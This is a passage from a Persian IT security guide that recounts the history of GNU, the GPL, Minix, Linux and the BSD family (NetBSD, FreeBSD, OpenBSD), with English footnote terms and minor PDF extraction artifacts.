‫ﺟﺎﻱ ﺍﻳﻨﻜﺎﺭ ﺍﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺍﻧﺠﻤﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ‪ ،Unix‬ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻗﺪﺭﺗﻤﻨﺪ ﻛﻪ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺒﻠـﻲ ﻭ ﻧﻴـﺰ‬
‫ﺁﻳﻨﺪﻩﺩﺍﺭ ﺑﻮﺩ ﭘﺎﻳﻪﺭﻳﺰﻱ ﻛﻨﺪ‪ .‬ﺍﻭ ﻃﺮﺡ ﺧﻮﺩ ﺭﺍ ‪ GNU‬ﻧﺎﻣﻴﺪ؛ ﻳﻚ ﻣﺨﻔﻒ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﻋﺒﺎﺭﺕ "‪ Unix GNU‬ﻧﻴـﺴﺖ"!‪ ١٨‬ﺍﺯ ﻧﻈـﺮ ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﺭﺍﻳﮕﺎﻥ ﺑﻮﺩﻥ ﺗﻨﻬﺎ ﻣﻌﻴﺎﺭ ﻫﺰﻳﻨﻪ ﻧﺒﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﻳﻚ ﻣﻌﻴﺎﺭ ﺁﺯﺍﺩﻱ ﻫﻢ ﺑﻮﺩ‪ .‬ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺑﻮﺩ ﻛﻪ ﺍﻭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫‪٢٦٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﻛﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﻧﻤﺎﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﺯﺍﺩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻴﺎﻥ ﺩﻭﺳﺘﺎﻧﺶ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ‪.‬‬
‫ﺍﻭ ﺁﺯﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺁﻧﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﺑﻴﺎﻥ ﻣﻄﺮﺡ ﺍﺳﺖ‪ ،‬ﻧﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﻣﺸﺮﻭﺑﺎﺕ ﺍﻟﻜﻠﻲ‪ .‬ﺗﺎ ﺳـﺎﻝ ‪ ۱۹۸۵‬ﺍﻭﻟـﻴﻦ ﻣﺤـﺼﻮﻝ‬
‫ﻋﻤﺪﺓ ‪ - GNU‬ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ ‪ - Emacs‬ﺑﻪ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺭﺷﺪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺍﺳـﺘﺎﻟﻤﻦ ﻫـﻢ ﺑـﻪ‬
‫ﺭﺍﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ .‬ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﺎﻟﻤﻦ ﻛﺎﺭ ﺭﻭﻱ ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺁﺯﺍﺩ ‪ C‬ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ؛ ‪ .GNU C‬ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ‬
‫ﻋﻤﻮﻣﻲ ‪ ١٩(GPL) GNU‬ﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﺷﺪﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ‪ ،‬ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺷﺨﺼﻲ ﺭﺍ‬
‫ﻣﻲﺩﺍﺩ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻫﻤﺔ ﺗﻐﻴﻴﺮﺍﺕ ﺁﺗﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺗﺤﺖ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻫﻤﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻗﺒﻠﻲ ﻣﻨﺘﺸﺮ ﺷـﻮﻧﺪ‪ .‬ﻫﻤـﺎﻥ ﺳـﺎﻝ ﺍﺳـﺘﺎﻟﻤﻦ‬
‫ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ‪ ٢٠‬ﺭﺍ ﺗﺄﺳﻴﺲ ﻛﺮﺩ؛ ﺑﻨﻴﺎﺩﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻫﺪﺍﻳﺎﻱ ﻣﺮﺩﻣﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳـﺴﺎﻧﻲ ﻛـﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺘﺸﺎﺭ ﻣﺠﺪﺩ ﻣﻲﻧﻮﺷﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ‪.‬‬
‫‪ Unix‬ﻭ ‪Minix‬‬
‫ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺳﺘﺎﻟﻤﻦ ﭘﺮﻭﮊﺓ ‪ GNU‬ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ‪ ،‬ﭘﺮﻭﻓﺴﻮﺭ ﺍﻧﺪﺭﻭ ﺍﺱ‪ .‬ﺗﺎﻧﻨﺒﺎﻡ‪ ٢١‬ﺗﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺧـﻮﺩﺵ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Unix‬ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﺪﺭﻳﺲ ﻭ ﺗﺤﻘﻴﻖ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﻮﺷﺘﻪ ﻣﻲﺷﺪ ﺍﻭ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺯﺍﺩﺍﻧﻪ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺧﻮﺩ ﻣﻨﺘﺸﺮ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺣﻖ ﺍﻣﺘﻴـﺎﺯﻱ ﺑـﻪ ‪ AT&T‬ﭘﺮﺩﺍﺧـﺖ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ‪ ،Minix ،‬ﺑﺮ ﺍﺳﺎﺱ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ‪ IBM PC AT‬ﻋﻤﻞ ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺮ ‪ Intel‬ﻣﺠﻬﺰ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻃﺮﺡ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻳﻚ ﺑﺴﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺴﺘﻨﺪﺳﺎﺯﻱﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﻋـﺎﻟﻲ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ "ﻛﺎﺭﺁﻣﺪﻱ" ﺩﺭ ﻃﺮﺍﺣﻲ ‪ Minix‬ﻳﻚ ﻣﻌﻴﺎﺭ ﺍﺳﺎﺳﻲ ﻧﺒﻮﺩ‪ ،‬ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺩﺭ ﻛﻨﺎﺭ ﻣﺴﺎﺋﻞ ﺭﻋﺎﻳﺖ ﺣﻖ ﻛﭙـﻲ ﻣﺮﺑـﻮﻁ‬
‫ﺑﻪ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺑﺎﻋﺚ ﺷﺪ ‪ Minix‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﺯﻣﺮﻩ ﺩﺭ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ‪ ،‬ﮔﺰﻳﻨﺔ ﺧﻮﺑﻲ ﺍﺯ ﺁﺏ ﺩﺭﻧﻴﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۱‬ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﻋﻠﻮﻡ ﺭﺍﻳﺎﻧﺔ ﻓﻨﻼﻧﺪﻱ ﺑﻪ ﻧﺎﻡ ﻟﻴﻨﻮﺱ ﺗﺮﻭﺍﻟﺪﺯ‪ ٢٢‬ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﻳﻚ ﻧﺴﺨﺔ ﺁﺯﺍﺩ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ‪ Unix‬ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﻣﺮﻩ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎﺷﺪ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ‪ ،Minix‬ﮔﺎﻡ ﺑﻪ ﮔﺎﻡ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ﻭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺩﻭﺑـﺎﺭﻩ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻛﻪ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺗﺎﻧﻨﺒﺎﻡ ﺩﺭ ﺁﻥ ﻧﺒﻮﺩ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺳﻴﺴﺘﻢ ﺑﺪﺳﺖ ﺁﻣـﺪﻩ‬
‫ﺭﺍ "‪ "Linux‬ﻧﺎﻣﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺁﻧﺮﺍ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ‪ GPL‬ﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺗﺮﻛﻴﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑـﺎ ﺳـﺎﻳﺮ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﺭﺍﻳﮕﺎﻥ ﻣﻮﺟﻮﺩ ﺧﺼﻮﺻﹰﺎ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﻭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ ‪ GNU‬ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Windows‬ﻛﻨﺴﺮﺳﻴﻮﻡ ‪ ،X‬ﺗﻮﺍﻧـﺴﺖ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻛﺎﻣﻞ ﻭ ﻋﻤﻠﻴﺎﺗﻲ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﻛﺎﺭ ﺭﻭﻱ ‪ Linux‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺗﻮﺳﻂ ﺻﺪﻫﺎ ﻛﻤﻚﻛﻨﻨﺪﻩ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺩﺍﺭﺩ‪.‬‬
‫‪NetBSD, FreeBSD, OpenBSD‬‬
‫‪٢٣‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۸‬ﮔﺮﻭﻩ ﺗﺤﻘﻴﻘﺎﺕ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﻛﻠﻲ )‪ (CSRG‬ﻃﺮﺣﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﺬﻑ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ AT&T‬ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫ﺧﻮﺩ ﺷﺮﻭﻉ ﻛﺮﺩ‪" .‬ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺍﻭﻝ" ﻛﻪ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﮊﻭﺋﻦ ‪ ۱۹۸۹‬ﺁﻣﺎﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺷـﺎﻣﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺑﺮﻛﻠـﻲ ﺍﺯ‬
‫‪ TCP/IP‬ﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﺑﻮﻃﻪ ﻣﻲﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﻪ ﺑﻬﺎﻱ ‪ ۱۰۰۰‬ﺩﻻﺭ ﺭﻭﻱ ﻧﻮﺍﺭ ﺿﺒﻂ ﺗﻮﺯﻳﻊ ﺷﺪ‪ ،‬ﻭ ﻫﺮ ﻛﺲ ﻛـﻪ ﺁﻥ ﺭﺍ ﺧﺮﻳـﺪﺍﺭﻱ‬
‫ﻣﻲﻛﺮﺩ ﻣﺠﺎﺯ ﺑﻮﺩ ﻫﺮ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﻣﻲﺧﻮﺍﺳﺖ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪ ﺁﻥ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻣﺤﺪﻭﺩﻳﺖ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﺍﺻﻠﻲ ﻣﺤﻔـﻮﻅ ﺑﻤﺎﻧـﺪ‪.‬‬
‫ﭼﻨﺪ ﺑﺮﻧﺎﻣﺔ ﺑﺰﺭﮒ ﺑﺮﻧﺎﻣﻪ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‪ ٢٤‬ﺭﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻧﺪ؛ ﻭ ﺑﺮﻧﺎﻣﺔ ﺑﺮﻛﻠﻲ ﺑﺴﺮﻋﺖ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺒﻨﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱﻫـﺎﻱ‬
‫‪ TCP/IP‬ﺩﺭ ﺳﺮﺍﺳﺮ ﺻﻨﻌﺖ ﺷﺪ‪ .‬ﻳﻚ ﻣﺤﺼﻮﻝ ﻣﻮﻗﺖ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ 4.3BSD Reno‬ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ‪ ۱۹۹۰‬ﻭ ﻣﺤـﺼﻮﻝ ﻣﻮﻗـﺖ ﺩﻭﻡ‪،‬‬
‫"ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺩﻭﻡ"‪ ،‬ﺩﺭ ﮊﻭﺋﻦ ‪ ۱۹۹۱‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﻣﺤﺼﻮﻝ‪ ،‬ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻛﺎﻣـﻞ ﺑـﻮﺩ ﻣﮕـﺮ ﺑـﺮﺍﻱ ‪ ۶‬ﻓﺎﻳـﻞ‬
‫‪GNU General Public License‬‬
‫‪Free Software Foundation‬‬
‫‪Andrew S. Tanenbaum‬‬
‫‪Linus Torvalds‬‬
‫‪Berkeley Computer Systems Research Group‬‬
‫‪FTP Anonymous Connection‬‬
‫‪19‬‬
‫‪20‬‬
‫‪21‬‬
‫‪22‬‬
‫‪23‬‬
‫‪24‬‬
‫‪٢٦١‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺩﺭ ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﻛﻪ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ AT&T‬ﻣﻲﺷﺪﻧﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺑـﻮﺩ‪ .‬ﺩﺭ ﭘـﺎﺋﻴﺰ ‪ ۱۹۹۱‬ﺑﻴـﻞ‬
‫ﺟﻮﻟﺘﻴﺰ‪ ٢٥‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺍﻳﻨﺘﻞ ﻧﻮﺷﺖ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺑﻪ ﻧﺎﻡ ‪ 360/BSD‬ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪.‬‬
‫ﻇﺮﻑ ﭼﻨﺪ ﻣﺎﻩ ﮔﺮﻭﻫﻲ ﺍﺯ ﺩﺍﻭﻃﻠﺒﺎﻥ ﻣﻮﻇﻒ ﺷﺪﻧﺪ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻢ ﺗﺸﻜﻴﻞﺷﺪﻩ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺗﻼﺵ ﺁﻧﺎﻥ ‪NetBSD‬‬
‫ﻧﺎﻣﮕﺬﺍﺭﻱ ﺷﺪ‪ .‬ﻃﺮﺡ ‪ NetBSD‬ﺑﺴﺮﻋﺖ ﺍﺯ ﻫﻢ ﭘﺎﺷﻴﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻣﻌﺘﻘﺪ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﭘﺮﻭﮊﻩ ﺑﺎﻳﺪ ﺁﻧﻘﺪﺭ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ ﻛـﻪ‬
‫ﺑﺘﻮﺍﻧﺪ ﺗﺎ ﺟﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺩﺍﻣﻪ ﺩﻫﺪ‪ ،‬ﻭﻟﻲ ﺍﻋﺘﻘـﺎﺩ‬
‫ﮔﺮﻭﻩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﻧﺠـﺎ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﻪ ﺑﻬﺘـﺮ ﺍﺟـﺮﺍ ﺷـﺪﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻭﻱ‬
‫ﺑﺴﺘﺮ‪ Intel/386‬ﻭ ﺳﺎﺩﻩﺗﺮ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ‪ .‬ﮔﺮﻭﻩ ﺩﻭﻡ ﺍﺯ ﮔﺮﻭﻩ ﺍﻭﻝ ﺟﺪﺍ ﺷـﺪ ﻭ ﭘـﺮﻭﮊﺓ ‪ FreeBSD‬ﺭﺍ ﺷـﺮﻭﻉ‬
‫ﻛﺮﺩ‪ .‬ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ‪ ،‬ﻳﻚ ﮔﺮﻭﻩ ﺍﻧﺸﻌﺎﺑﻲ ﺩﻳﮕﺮ ﺍﺯ ﭘﺮﻭﮊﻩ ‪ NetBSD‬ﺟﺪﺍ ﺷﺪ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺑﻮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻣـﻮﺭﺩ‬
‫ﺗﻮﺟﻪ ﻻﺯﻡ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺗﺄﻛﻴﺪ ﺍﻳﻦ ﮔﺮﻭﻩ ﺭﻭﻱ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﺋﻲ ﻣـﺸﻜﻼﺕ ﺑـﺎﻟﻘﻮﻩ ﺑـﻮﺩ‪ .‬ﺁﻧﻬـﺎ ﺍﻗﺘﺒـﺎﺱ ﺍﺯ‬
‫ﻼ ﺑﺮﺭﺳﻲ ﻧﺸﺪﻩﺑﻮﺩﻧﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﮔـﺮﻭﻩ ﺳـﻮﻡ ‪OpenBSD‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻭ ‪driver‬ﻫﺎ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻛﻴﻔﻴﺖ ﻛﺎﻣ ﹰ‬
‫ﻧﺎﻡ ﮔﺮﻓﺖ‪.‬‬
‫ﻣﺸﺎﻏﻞ ‪ Unix‬ﺭﺍ ﺑﺮﮔﺰﻳﺪﻧﺪ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﻗﻴﻤﺘﮕﺬﺍﺭﻱ ﺍﻧﺤﺼﺎﺭﻱ ‪ Microsoft‬ﻭ ﺍﻣﻨﻴﺖ ﻭ ﻇﺮﺍﻓﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ ،Unix‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺗﺠﺎﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Linux‬ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻧﺪ‪ .‬ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ‪ ،‬ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺍﻣﻨﻴﺖ ﺑﺴﺘﺮ ‪ OpenBSD‬ﺭﺍ ﻣﻄﻠﻮﺏ ﻳﺎﻓﺘﻨﺪ‬
‫ﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﺑﺮﺩﻧﺪ‪ .‬ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﻨﻬﺎﺩﻱ ‪ BSDI‬ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﺠـﺎﺭﻱ ﺑـﻮﻳﮋﻩ ﺑﻌـﻀﻲ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺍﺻﻠﻲ ﻣﻴﺰﺑﺎﻥ ﻭﺏ ﺍﻭﻟﻴﻪ ﺟﺬﺍﺏ ﺑﻮﺩ ﻭ ﺁﻧﺮﺍ ‪ BSD/OS‬ﻧﺎﻣﻴﺪﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﺨﺘﻠﻒ ‪ BSD/OS‬ﺭﺍ ﺑﻪ ﻟﺤﺎﻅ ﺷﺮﺍﻳﻂ ﻣﻨﺎﺳـﺐ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﺍﻱ ﻭ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺮﺍﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻭ ﺩﺍﻧﺸﻜﺪﻩ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻧﺪ‪.‬‬
